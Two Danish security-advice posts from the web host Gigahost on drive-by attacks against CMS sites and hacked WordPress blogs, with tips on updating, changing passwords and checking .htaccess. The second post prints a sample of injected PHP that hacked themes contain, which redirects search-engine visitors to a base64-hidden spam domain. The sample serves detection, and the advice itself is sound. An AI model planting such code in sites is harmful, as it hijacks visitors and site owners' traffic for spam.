Gigahost

Undgå “drive-by”-angreb på dit CMS

October 4th, 2009 | Tags: cms, drive-by, h4x, hacking, joomla, milw0rm, sikkerhed, wordpress |

Vi bemærker sommetider “drive-by”-angreb på sider hos Gigahost, hvor hackere bruger automatiske scripts til at afprøve kendte sikkerhedsfejl. De søger så på eksempelvis Google efter sider der bruger scripts hvor der kan være sikkerhedsfejl i. Eller alle sider på en server kan blive scannet og sikkerhedshuller udnyttet.

Som regel er der tale om populære CMS-opsætninger som Joomla og WordPress, hvor brugeren har en ældre version med en kendt sikkerhedsfejl, som hackeren så udnytter.

Grundet den måde Gigahost er opbygget, hvor man kan hoste så mange hjemmesider som man har lyst, kan det betyde at så snart en enkelt side på ens webhotel er kompromitteret, så kan hackeren skaffe sig adgang til alle ens sider. Det anbefales derfor at man sikre at alle sider ikke er blevet ændret så de indeholder bagdøre eller lignende. Desuden anbefaler vi at man følger vores sikkerhedsvejledning:

Opdater alle dine scripts

Opdater alle scripts (inkl. deres moduler, extensions, addons, components, themes, templates, patches og lignende udvidelser) til nyeste version. Sørg jævnligt for at gøre dette, og følg med i nyhederne omkring disse opdateringer. Det er meget vigtigt at forstå at sikkerheden går tabt hvis bare et af disse indeholder sikkerhedsfejl.

Skift adgangskoden og upload alt på ny

Skulle du være så uheldig at blive ramt, kan du ikke længere stole på det indhold, der ligger på siderne, idet hackeren kan have lagt bagdøre ind. Bemærk at dette gælder alle dine domæner (hvis du har mere end et). Hvis hackeren har haft adgang, kan der være lagt indhold eller bagdøre på de øvrige domæner også.

Hackeren kan muligvis have aflæst din kode ud fra en konfigurationsfil til databasen, eller lignende, hvorfor det er vigtigt at skifte den. Sørg for at bruge en lang kode med både tal og bogstaver.

Overvej dine sikkerhedsbehov

Hvis din side er særlig udsat, så overvej professionel assistance. Vi ser ofte sider med politisk eller religiøst indhold eller meninger være mere udsat. Ud over dette så er sider der henvender sig mod IT-branchen også ekstra udsat. Ligeledes hvis siden på nogen måde er kontroversiel.

Overvej hvem der har adgang til sårbare områder

Dette er især webhotellets kontrolcenter, database og FTP. Sørg for det kun er dem hvor det er absolut nødvendigt, og sørg for at sikre dig at det ikke bliver givet videre. Det er desuden vigtigt at skifte kode med jævne mellemrum, i tilfælde af at en af dem der måtte have koden selv er blevet kompromitteret.

Hold dig selv opdateret

Husk desuden at følge med i hvad der sker omkring dine scripts (og dertilhørende bestanddele) og deres sikkerhed. Det er en god ide at følge med i officielle mailinglister og ofte tjekke nyhederne omkring de scripts man bruger. Vi følger selv med i diverse sikkerhedsmedier som eksempelvis milw0rm og CGISecurity, men hvis du selv har en god nyhedsressource eller standardrutine du følger for at holde dine systemer sikre, så er du velkommen til at lægge en kommentar.

Hvis du er i tvivl kan du desuden altid skrive til supporten hos Gigahost.

Sikkerhedsfejl i WordPress fører til mange hackede blogs

June 14th, 2008 | Tags: hacking, sikkerhed, tips, wordpress |

Eftersom WordPress bliver mere og mere populært, er blogs drevet af WP mere og mere udsatte for hacker angreb og forsøg på at “hijacke” blogs. Den seneste stykke tid er en lang række blogs blevet overtaget af spammere og hackere, der ikke “overtager” bloggen helt, men lægger skjult kode ind, back-doors, annoncer og specielt links til spam sider.

Selvom WordPress er et af de mest sikre blogging platforme, bliver nye sikkerhedshuller hele tiden fundet (og lappet hurtigst muligt). Husk derfor at altid opdatere med den nyeste version af WordPress.

Hvis du ikke har den seneste udgave af WordPress, 2.5.1, er der stor sandsynlighed for at din side er hacket, selvom alt virker som det skal. Det sker ofte at der er lagt en backdoor ind, så hackeren har adgang til din blog, samt din adgangskode også kendes af hackeren. Vi anbefaler at du:

Opgraderer WordPress med det samme
Opdaterer din adgangskode

Kig efter skjult kode

Tjek derefter grundigt alle filer i det WordPress tema du bruger, da disse ikke bliver opgraderet. Det er som regel her at skjult kode bliver lagt ind, hovedsageligt med kommandoerne eval() og base64_decode(). Kig efter kode der ser sådan ud, som regel i din header.php:

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol", "cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false) { $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }? >

Hackere bruger kode som denne (mere kode her) for at lægge skjulte links ind på din side, der ikke kan ses af dem der besøger siden, men kun af søgemaskinerne. Tjek derfor alle filer for kode og specielt links der ikke burde være der.

Tjek din htaccess

Der er også fundet eksempler på at hackere bruger .htaccess til at få adgang til WP-Admin. Åbn din .htaccess fil, som ligger i din WordPress folder. Hvis der ikke er ændret noget, skal den se sådan ud:

# BEGIN WordPress RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [ L] # END WordPress

Denne kode kan også være der: < ifmodule mod_security.c> < files async-upload.php> SecFilterEngine Off SecFilterScanPOST Off < /files> < /ifmodule>

Hvis der er anden kode end det du har tilføjet det, er det bedst at du opdaterer alle dine WordPress filer (inklusive .htaccess, selvfølgeligt).

Fjern WP version fra meta tags

WordPress blogs bliver automatisk scannet af hackere efter version, på den måde er det nemmere at finde, og hacke, gamle blogs. WordPress bruger en meta tag til at vise hvilken version det er, der ser sådan ud:

< meta content="WordPress <?php bloginfo(’version’); ? />" name="generator" />

Du kan med fordel fjerne denne kode fra din header.php.

Flere tips

Begræns adgang til din wp-admin folder med .htacces, læs hvordan her.
Læg en tom index.html fil i din plugins folder, for at skjule hvilke plugins du bruger. Alternativ kan du bruge en index.php fil der viderestiller til din blog, læg < ?php header("Location: http://www.ditdomæne.dk");?> i en index.php fil og upload den.
Brug plugins som WP Security Scan for at teste sikkerheden.
Og til sidst, brug altid den seneste WordPress version, brug sikre adgangskoder, og husk altid at tage backup

Til sidst kan du læse om blogs der er blevet udsat for hacking, og deres erfaringer. Læs her, her, her, og her.